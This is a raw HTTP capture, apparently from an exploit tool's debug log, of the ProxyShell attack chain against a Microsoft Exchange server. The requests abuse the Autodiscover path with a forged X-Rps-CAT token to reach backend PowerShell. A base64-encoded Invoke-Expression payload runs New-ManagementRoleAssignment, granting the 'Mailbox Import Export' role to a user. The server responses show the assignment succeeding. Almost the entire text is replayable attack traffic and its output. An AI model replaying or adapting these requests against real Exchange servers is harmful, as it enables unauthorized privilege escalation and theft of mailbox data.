Name="stdout">AAAAAAAAAUsAAAAAAAAAAAMAAABnAQAAAAUQAgC6YAPcjEr4Tq3xAS9ylt/5AAAAAAAAAAAAAAAAAAAAAO+7vzxPYmogUmVmSWQ9IjAiPjxNUz48STMyIE49IlJ1bnNwYWNlU3RhdGUiPjI8L0kzMj48L01TPjwvT2JqPg==</rsp:Stream></rsp:ReceiveResponse></s:Body></s:Envelope>
####################
# Request:
####################
POST /Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net/PowerShell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTBNzbWNpbnR5cmVAZXhjaGcubGFuVS5TLTEtNS0yMS0yODAwNjc2ODI5LTI3NzcyNTc1OTEtMTY4NjUyMzEyNi0xMDAwRwEAAAAHAAAADFMtMS01LTMyLTU0NEUAAAAA&Email=Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net HTTP/1.1
Host: 192.168.159.42
User-Agent: Mozilla/5.0
Cookie: none
Accept: */*
Cache-Control: no-cache
Connection: keep-alive
Content-Type: application/soap+xml;charset=UTF-8
Content-Length: 6913

<?xml version="1.0" encoding="UTF-8"?><env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:env="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:b="http://schemas.dmtf.org/wbem/wsman/1/cimbinding.xsd" xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:x="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:cfg="http://schemas.microsoft.com/wbem/wsman/1/config"><env:Header><a:To>http://127.0.0.1/PowerShell/</a:To><a:ReplyTo><a:Address mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address></a:ReplyTo><w:MaxEnvelopeSize mustUnderstand="true">153600</w:MaxEnvelopeSize><a:MessageID>uuid:59E045EF-9A35-47D4-A084-AFB26E373A19</a:MessageID><p:SessionId mustUnderstand="false">uuid:D15EBBDD-EFE9-4368-9C74-DB2A170DBF24</p:SessionId><w:Locale xml:lang="en-US" mustUnderstand="false"/><p:DataLocale xml:lang="en-US" mustUnderstand="false"/><w:OperationTimeout>PT60S</w:OperationTimeout><w:ResourceURI>http://schemas.microsoft.com/powershell/Microsoft.Exchange</w:ResourceURI><a:Action mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Command</a:Action><w:SelectorSet><w:Selector Name="ShellId">F707CFC1-5849-4529-97C7-F492318D859C</w:Selector></w:SelectorSet></env:Header><env:Body><rsp:CommandLine CommandId="388572AC-50FE-4DB0-9095-3F5CDE8291DD"><rsp:Command>Invoke-Expression</rsp:Command><rsp:Arguments>AAAAAAAAAAMAAAAAAAAAAAMAAA8DAgAAAAYQAgC6YAPcjEr4Tq3xAS9ylt/5rHKFOP5QsE2QlT9c3oKR3e+7vzxPYmogUmVmSWQ9IjAiPgogIDxNUz4KICAgIDxPYmogTj0iUG93ZXJTaGVsbCIgUmVmSWQ9IjEiPgogICAgICA8TVM+CiAgICAgICAgPE9iaiBOPSJDbWRzIiBSZWZJZD0iMiI+CiAgICAgICAgICA8VE4gUmVmSWQ9IjAiPgogICAgICAgICAgICA8VD5TeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5MaXN0YDFbW1N5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uUFNPYmplY3QsIFN5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24sIFZlcnNpb249My4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1XV08L1Q+CiAgICAgICAgICAgIDxUPlN5c3RlbS5PYmplY3Q8L1Q+CiAgICAgICAgICA8L1ROPgogICAgICAgICAgPExTVD4KICAgICAgICAgICAgPE9iaiBSZWZJZD0iMyI+CiAgICAgICAgICAgICAgPE1TPgogICAgICAgICAgICAgICAgPFMgTj0iQ21kIj5OZXctTWFuYWdlbWVudFJvbGVBc3NpZ25tZW50PC9TPgogICAgICAgICAgICAgICAgPEIgTj0iSXNTY3JpcHQiPmZhbHNlPC9CPgogICAgICAgICAgICAgICAgPE5pbCBOPSJVc2VMb2NhbFNjb3BlIiAvPgogICAgICAgICAgICAgICAgPE9iaiBOPSJNZXJnZU15UmVzdWx0IiBSZWZJZD0iNCI+CiAgICAgICAgICAgICAgICAgIDxUTiBSZWZJZD0iMSI+CiAgICAgICAgICAgICAgICAgICAgPFQ+U3lzdGVtLk1hbmFnZW1lbnQuQXV0b21hdGlvbi5SdW5zcGFjZXMuUGlwZWxpbmVSZXN1bHRUeXBlczwvVD4KICAgICAgICAgICAgICAgICAgICA8VD5TeXN0ZW0uRW51bTwvVD4KICAgICAgICAgICAgICAgICAgICA8VD5TeXN0ZW0uVmFsdWVUeXBlPC9UPgogICAgICAgICAgICAgICAgICAgIDxUPlN5c3RlbS5PYmplY3Q8L1Q+CiAgICAgICAgICAgICAgICAgIDwvVE4+CiAgICAgICAgICAgICAgICAgIDxUb1N0cmluZz5Ob25lPC9Ub1N0cmluZz4KICAgICAgICAgICAgICAgICAgPEkzMj4wPC9JMzI+CiAgICAgICAgICAgICAgICA8L09iaj4KICAgICAgICAgICAgICAgIDxPYmogTj0iTWVyZ2VUb1Jlc3VsdCIgUmVmSWQ9IjUiPgogICAgICAgICAgICAgICAgICA8VE5SZWYgUmVmSWQ9IjEiIC8+CiAgICAgICAgICAgICAgICAgIDxUb1N0cmluZz5Ob25lPC9Ub1N0cmluZz4KICAgICAgICAgICAgICAgICAgPEkzMj4wPC9JMzI+CiAgICAgICAgICAgICAgICA8L09iaj4KICAgICAgICAgICAgICAgIDxPYmogTj0iTWVyZ2VQcmV2aW91c1Jlc3VsdHMiIFJlZklkPSI2Ij4KICAgICAgICAgICAgICAgICAgPFROUmVmIFJlZklkPSIxIiAvPgogICAgICAgICAgICAgICAgICA8VG9TdHJpbmc+Tm9uZTwvVG9TdHJpbmc+CiAgICAgICAgICAgICAgICAgIDxJMzI+MDwvSTMyPgogICAgICAgICAgICAgICAgPC9PYmo+CiAgICAgICAgICAgICAgICA8T2JqIE49Ik1lcmdlRXJyb3IiIFJlZklkPSI3Ij4KICAgICAgICAgICAgICAgICAgPFROUmVmIFJlZklkPSIxIiAvPgogICAgICAgICAgICAgICAgICA8VG9TdHJpbmc+Tm9uZTwvVG9TdHJpbmc+CiAgICAgICAgICAgICAgICAgIDxJMzI+MDwvSTMyPgogICAgICAgICAgICAgICAgPC9PYmo+CiAgICAgICAgICAgICAgICA8T2JqIE49Ik1lcmdlV2FybmluZyIgUmVmSWQ9IjgiPgogICAgICAgICAgICAgICAgICA8VE5SZWYgUmVmSWQ9IjEiIC8+CiAgICAgICAgICAgICAgICAgIDxUb1N0cmluZz5Ob25lPC9Ub1N0cmluZz4KICAgICAgICAgICAgICAgICAgPEkzMj4wPC9JMzI+CiAgICAgICAgICAgICAgICA8L09iaj4KICAgICAgICAgICAgICAgIDxPYmogTj0iTWVyZ2VWZXJib3NlIiBSZWZJZD0iOSI+CiAgICAgICAgICAgICAgICAgIDxUTlJlZiBSZWZJZD0iMSIgLz4KICAgICAgICAgICAgICAgICAgPFRvU3RyaW5nPk5vbmU8L1RvU3RyaW5nPgogICAgICAgICAgICAgICAgICA8STMyPjA8L0kzMj4KICAgICAgICAgICAgICAgIDwvT2JqPgogICAgICAgICAgICAgICAgPE9iaiBOPSJNZXJnZURlYnVnIiBSZWZJZD0iMTAiPgogICAgICAgICAgICAgICAgICA8VE5SZWYgUmVmSWQ9IjEiIC8+CiAgICAgICAgICAgICAgICAgIDxUb1N0cmluZz5Ob25lPC9Ub1N0cmluZz4KICAgICAgICAgICAgICAgICAgPEkzMj4wPC9JMzI+CiAgICAgICAgICAgICAgICA8L09iaj4KICAgICAgICAgICAgICAgIDxPYmogTj0iQXJncyIgUmVmSWQ9IjExIj4KICAgICAgICAgICAgICAgICAgPFROUmVmIFJlZklkPSIwIiAvPgogICAgICAgICAgICAgICAgICA8TFNUPgogICAgICAgICAgICAgICAgICAgIDxPYmogUmVmSWQ9IjEwMCI+CiAgICAgICAgICAgICAgICAgICAgICA8TVM+CiAgICAgICAgICAgICAgICAgICAgICAgIDxTIE49Ik4iPi1Sb2xlPC9TPgogICAgICAgICAgICAgICAgICAgICAgICA8UyBOPSJWIj5NYWlsYm94IEltcG9ydCBFeHBvcnQ8L1M+CiAgICAgICAgICAgICAgICAgICAgICA8L01TPgogICAgICAgICAgICAgICAgICAgIDwvT2JqPgogICAgICAgICAgICAgICAgICAgIDxPYmogUmVmSWQ9IjEwMSI+CiAgICAgICAgICAgICAgICAgICAgICA8TVM+CiAgICAgICAgICAgICAgICAgICAgICAgIDxTIE49Ik4iPi1Vc2VyPC9TPgogICAgICAgICAgICAgICAgICAgICAgICA8UyBOPSJWIj5zbWNpbnR5cmVAZXhjaGcubGFuPC9TPgogICAgICAgICAgICAgICAgICAgICAgPC9NUz4KICAgICAgICAgICAgICAgICAgICA8L09iaj4KICAgICAgICAgICAgICAgICAgPC9MU1Q+CiAgICAgICAgICAgICAgICA8L09iaj4KICAgICAgICAgICAgICA8L01TPgogICAgICAgICAgICA8L09iaj4KICAgICAgICAgIDwvTFNUPgogICAgICAgIDwvT2JqPgogICAgICAgIDxCIE49IklzTmVzdGVkIj5mYWxzZTwvQj4KICAgICAgICA8TmlsIE49Ikhpc3RvcnkiIC8+CiAgICAgICAgPEIgTj0iUmVkaXJlY3RTaGVsbEVycm9yT3V0cHV0UGlwZSI+dHJ1ZTwvQj4KICAgICAgPC9NUz4KICAgIDwvT2JqPgogICAgPEIgTj0iTm9JbnB1dCI+dHJ1ZTwvQj4KICAgIDxPYmogTj0iQXBhcnRtZW50U3RhdGUiIFJlZklkPSIyMyI+CiAgICAgIDxUTiBSZWZJZD0iMiI+CiAgICAgICAgPFQ+U3lzdGVtLlRocmVhZGluZy5BcGFydG1lbnRTdGF0ZTwvVD4KICAgICAgICA8VD5TeXN0ZW0uRW51bTwvVD4KICAgICAgICA8VD5TeXN0ZW0uVmFsdWVUeXBlPC9UPgogICAgICAgIDxUPlN5c3RlbS5PYmplY3Q8L1Q+CiAgICAgIDwvVE4+CiAgICAgIDxUb1N0cmluZz5Vbmtub3duPC9Ub1N0cmluZz4KICAgICAgPEkzMj4yPC9JMzI+CiAgICA8L09iaj4KICAgIDxPYmogTj0iUmVtb3RlU3RyZWFtT3B0aW9ucyIgUmVmSWQ9IjI0Ij4KICAgICAgPFROIFJlZklkPSIzIj4KICAgICAgICA8VD5TeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLlJlbW90ZVN0cmVhbU9wdGlvbnM8L1Q+CiAgICAgICAgPFQ+U3lzdGVtLkVudW08L1Q+CiAgICAgICAgPFQ+U3lzdGVtLlZhbHVlVHlwZTwvVD4KICAgICAgICA8VD5TeXN0ZW0uT2JqZWN0PC9UPgogICAgICA8L1ROPgogICAgICA8VG9TdHJpbmc+MDwvVG9TdHJpbmc+CiAgICAgIDxJMzI+MDwvSTMyPgogICAgPC9PYmo+CiAgICA8QiBOPSJBZGRUb0hpc3RvcnkiPnRydWU8L0I+CiAgICA8T2JqIE49Ikhvc3RJbmZvIiBSZWZJZD0iMjUiPgogICAgICA8TVM+CiAgICAgICAgPEIgTj0iX2lzSG9zdE51bGwiPnRydWU8L0I+CiAgICAgICAgPEIgTj0iX2lzSG9zdFVJTnVsbCI+dHJ1ZTwvQj4KICAgICAgICA8QiBOPSJfaXNIb3N0UmF3VUlOdWxsIj50cnVlPC9CPgogICAgICAgIDxCIE49Il91c2VSdW5zcGFjZUhvc3QiPnRydWU8L0I+CiAgICAgIDwvTVM+CiAgICA8L09iaj4KICAgIDxCIE49IklzTmVzdGVkIj5mYWxzZTwvQj4KICA8L01TPgo8L09iaj4K</rsp:Arguments></rsp:CommandLine></env:Body></env:Envelope>
####################
# Response:
####################
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/soap+xml;charset=UTF-8
Server: Microsoft-IIS/10.0
request-id: 8c3ee978-8252-4b27-9c45-8d9253c69a0b
X-CalculatedBETarget: win-bpid95acq7e.exchg.lan
X-AspNet-Version: 4.0.30319
Set-Cookie: X-BackEndCookie=; expires=Sun, 18-Aug-1991 19:14:44 GMT; path=/Autodiscover; secure; HttpOnly
X-Powered-By: ASP.NET
X-FEServer: WIN-BPID95ACQ7E
Date: Wed, 18 Aug 2021 19:14:43 GMT
Content-Length: 847

<s:Envelope xml:lang="en-US" xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:x="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"><s:Header><a:Action>http://schemas.microsoft.com/wbem/wsman/1/windows/shell/CommandResponse</a:Action><a:MessageID>uuid:D3F71350-2B28-4879-BDE0-71466F47FDCD</a:MessageID><a:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:To><a:RelatesTo>uuid:59E045EF-9A35-47D4-A084-AFB26E373A19</a:RelatesTo></s:Header><s:Body><rsp:CommandResponse><rsp:CommandId>388572AC-50FE-4DB0-9095-3F5CDE8291DD</rsp:CommandId></rsp:CommandResponse></s:Body></s:Envelope>
####################
# Request:
####################
POST /Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net/PowerShell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTBNzbWNpbnR5cmVAZXhjaGcubGFuVS5TLTEtNS0yMS0yODAwNjc2ODI5LTI3NzcyNTc1OTEtMTY4NjUyMzEyNi0xMDAwRwEAAAAHAAAADFMtMS01LTMyLTU0NEUAAAAA&Email=Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net HTTP/1.1
Host: 192.168.159.42
User-Agent: Mozilla/5.0
Cookie: none
Accept: */*
Cache-Control: no-cache
Connection: keep-alive
Content-Type: application/soap+xml;charset=UTF-8
Content-Length: 1814

<?xml version="1.0" encoding="UTF-8"?><env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:env="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:b="http://schemas.dmtf.org/wbem/wsman/1/cimbinding.xsd" xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:x="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:cfg="http://schemas.microsoft.com/wbem/wsman/1/config"><env:Header><a:To>http://127.0.0.1/PowerShell/</a:To><a:ReplyTo><a:Address mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address></a:ReplyTo><w:MaxEnvelopeSize mustUnderstand="true">153600</w:MaxEnvelopeSize><a:MessageID>uuid:6820E227-BC61-4206-84B3-8FDA64983B74</a:MessageID><p:SessionId mustUnderstand="false">uuid:D15EBBDD-EFE9-4368-9C74-DB2A170DBF24</p:SessionId><w:Locale xml:lang="en-US" mustUnderstand="false"/><p:DataLocale xml:lang="en-US" mustUnderstand="false"/><w:OperationTimeout>PT60S</w:OperationTimeout><w:ResourceURI>http://schemas.microsoft.com/powershell/Microsoft.Exchange</w:ResourceURI><a:Action mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Receive</a:Action><w:OptionSet><w:Option Name="WSMAN_CMDSHELL_OPTION_KEEPALIVE">TRUE</w:Option></w:OptionSet><w:SelectorSet><w:Selector Name="ShellId">F707CFC1-5849-4529-97C7-F492318D859C</w:Selector></w:SelectorSet></env:Header><env:Body><rsp:Receive><rsp:DesiredStream CommandId="388572AC-50FE-4DB0-9095-3F5CDE8291DD">stdout</rsp:DesiredStream></rsp:Receive></env:Body></env:Envelope>
####################
# Response:
####################
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/soap+xml;charset=UTF-8
Server: Microsoft-IIS/10.0
request-id: 33023bc0-f1eb-43b2-b307-3b2f404b5192
X-CalculatedBETarget: win-bpid95acq7e.exchg.lan
X-AspNet-Version: 4.0.30319
Set-Cookie: X-BackEndCookie=; expires=Sun, 18-Aug-1991 19:14:44 GMT; path=/Autodiscover; secure; HttpOnly
X-Powered-By: ASP.NET
X-FEServer: WIN-BPID95ACQ7E
Date: Wed, 18 Aug 2021 19:14:44 GMT
Content-Length: 4349

<s:Envelope xml:lang="en-US" xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"><s:Header><a:Action>http://schemas.microsoft.com/wbem/wsman/1/windows/shell/ReceiveResponse</a:Action><a:MessageID>uuid:61D39315-D845-4FEC-BCB8-5415CEF5A38A</a:MessageID><a:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:To><a:RelatesTo>uuid:6820E227-BC61-4206-84B3-8FDA64983B74</a:RelatesTo></s:Header><s:Body><rsp:ReceiveResponse><rsp:Stream Name="stdout" CommandId="388572AC-50FE-4DB0-9095-3F5CDE8291DD">AAAAAAAAAUwAAAAAAAAAAAMAAAjzAQAAAAQQBAC6YAPcjEr4Tq3xAS9ylt/5rHKFOP5QsE2QlT9c3oKR3e+7vzxPYmogUmVmSWQ9IjAiPjxUTiBSZWZJZD0iMCI+PFQ+TWljcm9zb2Z0LkV4Y2hhbmdlLkRhdGEuRGlyZWN0b3J5Lk1hbmFnZW1lbnQuRXhjaGFuZ2VSb2xlQXNzaWdubWVudFByZXNlbnRhdGlvbjwvVD48VD5NaWNyb3NvZnQuRXhjaGFuZ2UuRGF0YS5EaXJlY3RvcnkuTWFuYWdlbWVudC5BRFByZXNlbnRhdGlvbk9iamVjdDwvVD48VD5NaWNyb3NvZnQuRXhjaGFuZ2UuRGF0YS5EaXJlY3RvcnkuQURPYmplY3Q8L1Q+PFQ+TWljcm9zb2Z0LkV4Y2hhbmdlLkRhdGEuRGlyZWN0b3J5LkFEUmF3RW50cnk8L1Q+PFQ+TWljcm9zb2Z0LkV4Y2hhbmdlLkRhdGEuQ29uZmlndXJhYmxlT2JqZWN0PC9UPjxUPlN5c3RlbS5PYmplY3Q8L1Q+PC9UTj48VG9TdHJpbmc+TWFpbGJveCBJbXBvcnQgRXhwb3J0LXNtY2ludHlyZS0yPC9Ub1N0cmluZz48UHJvcHM+PFMgTj0iRGF0YU9iamVjdCI+TWFpbGJveCBJbXBvcnQgRXhwb3J0LXNtY2ludHlyZS0yPC9TPjxTIE49IlVzZXIiPmV4Y2hnLmxhbi9Vc2Vycy9zbWNpbnR5cmU8L1M+PFMgTj0iQXNzaWdubWVudE1ldGhvZCI+RGlyZWN0PC9TPjxTIE49IklkZW50aXR5Ij5NYWlsYm94IEltcG9ydCBFeHBvcnQtc21jaW50eXJlLTI8L1M+PE5pbCBOPSJFZmZlY3RpdmVVc2VyTmFtZSIgLz48TmlsIE49IkFzc2lnbm1lbnRDaGFpbiIgLz48UyBOPSJSb2xlQXNzaWduZWVUeXBlIj5Vc2VyPC9TPjxTIE49IlJvbGVBc3NpZ25lZSI+ZXhjaGcubGFuL1VzZXJzL3NtY2ludHlyZTwvUz48UyBOPSJSb2xlIj5NYWlsYm94IEltcG9ydCBFeHBvcnQ8L1M+PFMgTj0iUm9sZUFzc2lnbm1lbnREZWxlZ2F0aW9uVHlwZSI+UmVndWxhcjwvUz48TmlsIE49IkN1c3RvbVJlY2lwaWVudFdyaXRlU2NvcGUiIC8+PE5pbCBOPSJDdXN0b21Db25maWdXcml0ZVNjb3BlIiAvPjxTIE49IlJlY2lwaWVudFJlYWRTY29wZSI+T3JnYW5pemF0aW9uPC9TPjxTIE49IkNvbmZpZ1JlYWRTY29wZSI+T3JnYW5pemF0aW9uQ29uZmlnPC9TPjxTIE49IlJlY2lwaWVudFdyaXRlU2NvcGUiPk9yZ2FuaXphdGlvbjwvUz48UyBOPSJDb25maWdXcml0ZVNjb3BlIj5Pcmdhbml6YXRpb25Db25maWc8L1M+PEIgTj0iRW5hYmxlZCI+dHJ1ZTwvQj48UyBOPSJSb2xlQXNzaWduZWVOYW1lIj5zbWNpbnR5cmU8L1M+PEIgTj0iSXNWYWxpZCI+dHJ1ZTwvQj48UyBOPSJFeGNoYW5nZVZlcnNpb24iPjAuMTEgKDE0LjAuNTUwLjApPC9TPjxTIE49Ik5hbWUiPk1haWxib3ggSW1wb3J0IEV4cG9ydC1zbWNpbnR5cmUtMjwvUz48UyBOPSJEaXN0aW5ndWlzaGVkTmFtZSI+Q049TWFpbGJveCBJbXBvcnQgRXhwb3J0LXNtY2ludHlyZS0yLENOPVJvbGUgQXNzaWdubWVudHMsQ049UkJBQyxDTj1UYXJnZXQgT3JnLENOPU1pY3Jvc29mdCBFeGNoYW5nZSxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPWV4Y2hnLERDPWxhbjwvUz48RyBOPSJHdWlkIj44NjRjODRlYy1jZDU2LTQ4NjAtOTNmYi03N2U2Y2IzNTZjNzQ8L0c+PFMgTj0iT2JqZWN0Q2F0ZWdvcnkiPmV4Y2hnLmxhbi9Db25maWd1cmF0aW9uL1NjaGVtYS9tcy1FeGNoLVJvbGUtQXNzaWdubWVudDwvUz48T2JqIE49Ik9iamVjdENsYXNzIiBSZWZJZD0iMSI+PFROIFJlZklkPSIxIj48VD5NaWNyb3NvZnQuRXhjaGFuZ2UuRGF0YS5NdWx0aVZhbHVlZFByb3BlcnR5YDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dPC9UPjxUPk1pY3Jvc29mdC5FeGNoYW5nZS5EYXRhLk11bHRpVmFsdWVkUHJvcGVydHlCYXNlPC9UPjxUPlN5c3RlbS5PYmplY3Q8L1Q+PC9UTj48TFNUPjxTPnRvcDwvUz48Uz5tc0V4Y2hSb2xlQXNzaWdubWVudDwvUz48L0xTVD48L09iaj48RFQgTj0iV2hlbkNoYW5nZWQiPjIwMjEtMDgtMThUMTU6MTQ6NDQtMDQ6MDA8L0RUPjxEVCBOPSJXaGVuQ3JlYXRlZCI+MjAyMS0wOC0xOFQxNToxNDo0NC0wNDowMDwvRFQ+PERUIE49IldoZW5DaGFuZ2VkVVRDIj4yMDIxLTA4LTE4VDE5OjE0OjQ0WjwvRFQ+PERUIE49IldoZW5DcmVhdGVkVVRDIj4yMDIxLTA4LTE4VDE5OjE0OjQ0WjwvRFQ+PFMgTj0iT3JnYW5pemF0aW9uSWQiPjwvUz48UyBOPSJJZCI+TWFpbGJveCBJbXBvcnQgRXhwb3J0LXNtY2ludHlyZS0yPC9TPjxTIE49Ik9yaWdpbmF0aW5nU2VydmVyIj5XSU4tQlBJRDk1QUNRN0UuZXhjaGcubGFuPC9TPjxTIE49Ik9iamVjdFN0YXRlIj5VbmNoYW5nZWQ8L1M+PC9Qcm9wcz48L09iaj4=</rsp:Stream><rsp:Stream Name="stdout" CommandId="388572AC-50FE-4DB0-9095-3F5CDE8291DD">AAAAAAAAAU0AAAAAAAAAAAMAAABnAQAAAAYQBAC6YAPcjEr4Tq3xAS9ylt/5rHKFOP5QsE2QlT9c3oKR3e+7vzxPYmogUmVmSWQ9IjAiPjxNUz48STMyIE49IlBpcGVsaW5lU3RhdGUiPjQ8L0kzMj48L01TPjwvT2JqPg==</rsp:Stream><rsp:CommandState CommandId="388572AC-50FE-4DB0-9095-3F5CDE8291DD" State="http://schemas.microsoft.com/wbem/wsman/1/windows/shell/CommandState/Done"><rsp:ExitCode>0</rsp:ExitCode></rsp:CommandState></rsp:ReceiveResponse></s:Body></s:Envelope>
####################
# Request:
####################
POST /Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net/PowerShell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTBNzbWNpbnR5cmVAZXhjaGcubGFuVS5TLTEtNS0yMS0yODAwNjc2ODI5LTI3NzcyNTc1OTEtMTY4NjUyMzEyNi0xMDAwRwEAAAAHAAAADFMtMS01LTMyLTU0NEUAAAAA&Email=Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net HTTP/1.1
Host: 192.168.159.42
User-Agent: Mozilla/5.0
Cookie: none
Accept: */*
Cache-Control: no-cache
Connection: keep-alive
Content-Type: application/soap+xml;charset=UTF-8
Content-Length: 1768

<?xml version="1.0" encoding="UTF-8"?><env:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:env="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:b="http://schemas.dmtf.org/wbem/wsman/1/cimbinding.xsd" xmlns:n="http://schemas.xmlsoap.org/ws/2004/09/enumeration" xmlns:x="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:cfg="http://schemas.microsoft.com/wbem/wsman/1/config"><env:Header><a:To>http://127.0.0.1/PowerShell/</a:To><a:ReplyTo><a:Address mustUnderstand="true">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address></a:ReplyTo><w:MaxEnvelopeSize mustUnderstand="true">153600</w:MaxEnvelopeSize><a:MessageID>uuid:6A35ACDB-6355-4909-AD57-E1FEDDEE1AC8</a:MessageID><p:SessionId mustUnderstand="false">uuid:D15EBBDD-EFE9-4368-9C74-DB2A170DBF24</p:SessionId><w:Locale xml:lang="en-US" mustUnderstand="false"/><p:DataLocale xml:lang="en-US" mustUnderstand="false"/><w:OperationTimeout>PT60S</w:OperationTimeout><w:ResourceURI>http://schemas.microsoft.com/powershell/Microsoft.Exchange</w:ResourceURI><a:Action mustUnderstand="true">http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Signal</a:Action><w:SelectorSet><w:Selector Name="ShellId">F707CFC1-5849-4529-97C7-F492318D859C</w:Selector></w:SelectorSet></env:Header><env:Body><rsp:Signal CommandId="388572AC-50FE-4DB0-9095-3F5CDE8291DD"><rsp:Code>http://schemas.microsoft.com/wbem/wsman/1/windows/shell/signal/terminate</rsp:Code></rsp:Signal></env:Body></env:Envelope>
####################
# Response:
####################
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/soap+xml;charset=UTF-8
Server: Microsoft-IIS/10.0
request-id: 6f10d0b2-ad9e-4f7d-a30c-691e73181922
X-CalculatedBETarget: win-bpid95acq7e.exchg.lan
X-AspNet-Version: 4.0.30319
Set-Cookie: X-BackEndCookie=; expires=Sun, 18-Aug-1991 19:14:44 GMT; path=/Autodiscover; secure; HttpOnly
X-Powered-By: ASP.NET
X-FEServer: WIN-BPID95ACQ7E
Date: Wed, 18 Aug 2021 19:14:44 GMT
Content-Length: 757

<s:Envelope xml:lang="en-US" xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:x="http://schemas.xmlsoap.org/ws/2004/09/transfer" xmlns:w="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:rsp="http://schemas.microsoft.com/wbem/wsman/1/windows/shell" xmlns:p="http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd"><s:Header><a:Action>http://schemas.microsoft.com/wbem/wsman/1/windows/shell/SignalResponse</a:Action><a:MessageID>uuid:E96974F4-8D77-4D0C-B0F9-B0A374B0914C</a:MessageID><a:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:To><a:RelatesTo>uuid:6A35ACDB-6355-4909-AD57-E1FEDDEE1AC8</a:RelatesTo></s:Header><s:Body><rsp:SignalResponse/></s:Body></s:Envelope>
####################
# Request:
####################
POST /Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net/PowerShell/?X-Rps-CAT=VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTBNzbWNpbnR5cmVAZXhjaGcubGFuVS5TLTEtNS0yMS0yODAwNjc2ODI5LTI3NzcyNTc1OTEtMTY4NjUyMzEyNi0xMDAwRwEAAAAHAAAADFMtMS01LTMyLTU0NEUAAAAA&Email=Autodiscover/autodiscover.json?a=hobert@weimann-oconner.net HTTP/1.1
Host: 192.168.159.42
User-Agent: Mozilla/5.0
Cookie: none
Accept: */*
Cache-Control: no-cache
Connection: keep-alive
Content-Type: application/soap+xml;charset=UTF-8
